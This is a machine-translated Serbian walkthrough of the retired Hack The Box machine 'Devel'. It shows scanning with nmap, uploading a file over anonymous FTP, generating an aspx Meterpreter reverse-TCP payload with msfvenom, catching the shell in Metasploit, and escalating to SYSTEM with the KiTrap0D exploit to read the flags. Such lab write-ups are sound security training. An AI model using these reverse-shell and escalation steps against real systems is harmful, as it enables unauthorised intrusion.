Будите мирни и хакирајте кутију - Девел

Хацк Тхе Бок (ХТБ) је мрежна платформа која вам омогућава да тестирате своје вештине тестирања пенетрације. Садржи неколико изазова који се стално ажурирају. Неки од њих симулирају сценарије из стварног света, а неки се више нагињу ЦТФ стилу изазова.

Напомена . Дозвољени су само преписи на повучене ХТБ машине.

Девел је описан као релативно једноставан оквир који приказује сигурносне ризике повезане са неким подразумеваним конфигурацијама програма. То је машина на почетном нивоу која се може довршити помоћу јавно доступних екплоита.

Користићемо следеће алате за залагање кутије на Кали Линук кутији

  • нмап
  • зенмап
  • сеарцхсплоит
  • метасплоит
  • мсфвеном

Корак 1 - Скенирање мреже

Први корак пре експлоатације машине је мало скенирање и извиђање.

Ово је један од најважнијих делова, јер ће одредити шта касније можете покушати да искористите. Увек је боље потрошити више времена на ту фазу да бисте добили што више информација.

Користићу Нмап (Нетворк Маппер), који је бесплатан услужни програм отвореног кода за откривање мреже и ревизију безбедности. Користи необрађене ИП пакете да би утврдио који су хостови доступни на мрежи, које услуге ти хостови нуде, који оперативни системи раде, који тип филтера / заштитних зидова се користе и десетине других карактеристика.

Постоји много наредби које можете користити са овим алатом за скенирање мреже. Ако желите да сазнате више о томе, овде можете погледати документацију.

Користим следећу команду да бих стекао основну идеју о томе шта скенирамо

nmap -sV -O -F --version-light 10.10.10.5

-сВ: Испитајте отворене портове да бисте утврдили информације о услузи / верзији

-О: Омогући откривање ОС-а

-Ф: Брзи режим - Скенирајте мање портова од подразумеваног

--версион-лигхт: Ограничено на највероватније сонде (интензитет 2)

10.10.10. 5 : ИП адреса оквира Девел

Такође можете да користите Зенмап , који је званични ГУИ Нмап Сецурити Сцаннер. То је апликација са више платформи, бесплатна и отвореног кода која има за циљ да Нмап учини једноставним за почетнике, а истовремено пружа напредне функције за искусне Нмап кориснике.

Користим другачији скуп наредби за интензивно скенирање

nmap -A -v 10.10.10.5

-А: Омогућите откривање ОС-а, откривање верзија, скенирање скрипти и трагање

-в: Повећајте ниво детаљности

10.10.10.5: ИП адреса оквира Девел

Ако су вам резултати превише неодољиви, можете прећи на картицу Портс / Хостс да бисте добили само отворене портове.

Видимо да постоје 2 отворена порта:

Порт 21 . Контрола протокола за пренос датотека (ФТП) (команда). Овде је реч о Мицрософт ФТП-у

Лука 80 . Протокол за пренос хипертекста (ХТТП). Овде је реч о ИИС серверу

Чини се да је у овом случају највероватнији почетни вектор напада ФТП

Корак 2 - Рањиви ФТП

Ми смо отворили Фирефок и посетите вебсајт //10.10.10.5

Из фазе извиђања пронашли смо 2 датотеке под Мицрософт ФТП-ом. Да видимо да ли им можемо приступити из прегледача.

Датотеци слике велцоме.пнг могу приступити посетом

//10.10.10.5/welcome.png

Могу да приступите и иисстарт.хтм страници

//10.10.10.5/iisstart.htm

Сада знамо две ствари:

  • ФТП се користи као директоријум датотека за веб сервер - откривен када смо приступили датотекама из фазе обнављања.
  • ФТП омогућава анонимну пријаву - откривену када смо извршили интензивно скенирање.

Да видимо можемо ли створити датотеку и додати је на ФТП

Помоћу ове наредбе креирам датотеку и излазим резултат у датотеку која се зове хтб.хтмл

echo HackTheBox > htb.html

Затим проверавам помоћу лс да ли је датотека креирана и какав је садржај датотеке помоћу ове наредбе

cat htb.html

Хајде да се сада повежемо на ФТП да бисмо додали нашу тест датотеку

Да бих се повезао са ФТП-ом, користим ову наредбу

ftp 10.10.10.5

Укуцам анонимно као корисничко име и само притиснем ентер за лозинку, јер то омогућава анонимно пријављивање.

Сада сам повезан са ФТП-ом.

Овом командом додајем датотеку на ФТП

put htb.html

Датотека је успешно послата. Проверимо да ли можемо да му приступимо из Фирефока. Посетим страницу и на веб страници можемо видети излаз ХацкТхеБок .

//10.10.10.5/htb.html

Сад кад знамо да можемо да шаљемо датотеке, направимо екплоит!

Корак 3 - Коришћење МСФвенома за прављење експлоатације

Користићемо МСФвеном, који је генератор корисног терета. Више о томе можете сазнати овде

Али прво, хајде да проверимо на Метасплоит Фрамеворк-у који ће нам товар бити потребан да бисмо направили свој екплоит.

Знамо да морамо створити обрнуту љуску , која је врста љуске у којој циљана машина комуницира назад са нападачком машином. Нападачка машина има порт слушача на који прима везу, што се постиже коришћењем, извршавањем кода или наредбе.

Обрнута ТЦП љуска треба да буде за Виндовс и ми ћемо користити Метерпретер .

Са веб странице Оффенсиве Сецурити добијамо ову дефиницију за Метерпретер

Метерпретер је напредна, динамички проширив оптерећење које користи у меморији је Длл убризгавање стагерс и продужити преко мреже у рунтиме. Комуницира преко утичнице стагер и пружа свеобухватан Руби АПИ на страни клијента. Садржи историју наредби, завршетак картице, канале и још много тога.

Више о Метерпретеру можете прочитати овде.

Покрећем Метасплоит и тражим обрнути ТЦП терет. Користим следећу команду

search windows/meterpreter/reverse_tcp

Налазимо занимљив терет, број 2, који је обрнути ТЦП стагер .Ово корисно оптерећење убризгава ДЛЛ сервера метерпретера путем корисног терета Рефлецтиве Длл Ињецтион и поново се повезује са нападачем

payload/windows/meterpreter/reverse_tcp

Вратимо се сада мсфвеном- у да направимо свој екплоит . И још конкретније аспк? Уназад граната. Овај податак је прикупљен током фазе реконструкције

Користим следећу команду

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

- п : Корисни терет за коришћење

- ф : Излазни формат

- 0 : Сачувајте корисни терет у датотеку

ЛХОСТ : Локални домаћин

ЛПОРТ : Локална лука

Затим проверим код лс да ли је датотека креирана. Време је да га пошаљете на ФТП

Поново се повежите са ФТП-ом и пошаљите свој мали поклон!

Повежем се на ФТП, унесем анонимно као корисничко име, прескочим лозинку притиском на ентер. Затим датотеку шаљем следећом наредбом

put devel.aspx

Проверимо да ли је датотека исправно послата. Враћајући се у Фирефок , долазим до ФТП сервера следећом наредбом

ftp://10.10.10.5

Видимо да је наш мали поклон овде!

Ево подвига, ако вас занима како то изгледа

Корак 4 - Подешавање преслушавача помоћу Метасплоита

Вратимо се на Метасплоит где користим следећу команду за подешавање руковаоца корисним оптерећењем

use exploit/multi/handler

Проверавам које опције су доступне

Прво смо поставили корисни терет

set payload windows/meterpreter/reverse_tcp

Онда ГУБИТНИК

set lhost 10.10.14.15

И на крају ЛПОРТ

set lport 4444

Ако сада проверимо опције, требало би да видимо да је све постављено

Покренимо екплоит.

Након што се појави ова порука

Started reverse TCP handler on 10.10.14.15:4444

вратите се у прегледач и приступите страници на којој се хостује злонамерна скрипта

//10.10.10.5/devel.aspx

Тада бисте требали видети креирану сесију Метерпретера

Сада када имам сесију, покушавам да потражим прву заставицу усер.ткт користећи следећу команду на метерпретер

search -f user.txt

Ниједна датотека се не подудара са мојом претрагом. Покушавам са. * Да видим друге датотеке, али ништа корисно

Затим креирам љуску следећом наредбом

shell

Користим следећу команду да бих добио системске информације

systeminfo

Видимо да се регистровани власник зове бабис . Ово би могао бити важан податак када ћемо тражити корисничку заставицу. Такође можемо видети да машина нема хитне исправке.

Почињем да се крећем кроз фасцикле. Користим дир да бих спискао све датотеке / директоријуме, а цд да бих променио директоријум. Покушавам срећу у директоријумима бабис и Администратор , али обојица су ми дали одбијен приступ.

Морамо ескалирати привилегију! Знајући да када смо проверили системске информације, нису пронађене хитне исправке, можемо покушати да пронађемо експлоатације применљиве на ову машину.

Корак 5 - Извођење ескалације привилегија

Овом командом ставио сам сесију у други план

background

Затим користим следећу команду

use post/multi/recon/local_exploit_suggester

Овај модул предлаже локалне експлоатације Метерпретера који се могу користити. Експлоати се предлажу на основу архитектуре и платформе да корисник отвори шкољку, као и доступних експлоатација у Метерпретеру

Проверавам опције и постављам сесију

Важно је напоменути да неће сви локални подвизи бити испаљени. Експлоати се бирају на основу ових услова: типа сесије, платформе, архитектуре и захтеваних подразумеваних опција

Спуштање листе

exploit/windows/local/bypassuac_eventvwr

не успе због тога што ИИС корисник није део администраторске групе, што је подразумевано и што се очекује.

Користим следећи екплоит на листи, који је

use exploit/windows/local/ms10_015_kitrap0d

Овај модул ће створити нову сесију са привилегијама СИСТЕМА помоћу експлоатације КиТрап0Д од стране Тавис Орманди. Ако је сесија у употреби већ повишена, тада се екплоит неће покренути. Модул се ослања на китрап0д.к86.длл и није подржан у к64 издањима Виндовс-а.

Када смо покренули сисинфо у сесији Метерпретер, открило је да је циљ била к86 архитектура

Проверавам опције, а затим постављам сесију

Водим експлоатацију.

Експлоатација је била успешна, али сесија није могла да се креира. То је због првог реда у експлоатацији који покушава да постави обрнути руковатељ на подразумеваном етх0 и подразумеваном порту, а не ВПН интерфејсу за ХТБ лабораторије.

Started reverse TCP handler on 10.0.2.15:4444

Проверавам опције и постављам ЛХОСТ и ЛПОРТ

Затим проверавам све сесије живе следећом командом, у случају да ми сесија умре

sessions -l

Могу да видим своју сесију

Сад када имамо сесију метерпретера, почнимо да се крећемо кроз фасциклу и пронађемо заставице!

Корак 6 - Тражење заставице усер.ткт

Прво проверимо где се налазимо следећом командом

pwd

што је скраћеница за штампани радни директоријум

Идем до Ц: \ и је ли све датотеке / фасцикле. Већ знам одакле да тражим из свог претходног покушаја у 4. кораку - Подешавање преслушавача помоћу Метасплоита

Враћам се у директоријум Корисници

Затим пређите на бабис директоријум

Одатле идем у директоријум Десктоп

Пронашли смо датотеку усер.ткт.ткт ! За читање садржаја датотеке користим наредбу

cat user.txt.txt

Сад кад имамо корисничку заставицу, пронађимо основну заставицу!

Корак 7 - Тражење заставице роот.ткт

Повратак на Ц: \ за навигацију до фасцикле Администратор, а затим фасцикле Десктоп . Користим лс да бих спискао све датотеке у фасцикли Десктоп

Пронашли смо датотеку роот.ткт.ткт !

За читање садржаја датотеке користим наредбу

cat root.txt.txt

Честитамо! Пронашли сте обе заставе!

Молимо вас, немојте се устручавати да коментаришете, постављате питања или делите са пријатељима :)

Још мојих чланака можете видети овде

Можете ме пратити на Твиттер-у или на ЛинкедИн-у

И не заборавите да # ГетСецуре , # БеСецуре & # СтаиСецуре !

Остали чланци о Хацк Тхе Боку

  • Буди смирен и хакирај кутију - хром
  • Будите мирни и хакирајте кутију - наслеђе
  • Буди смирен и хакирај кутију - Звучни сигнал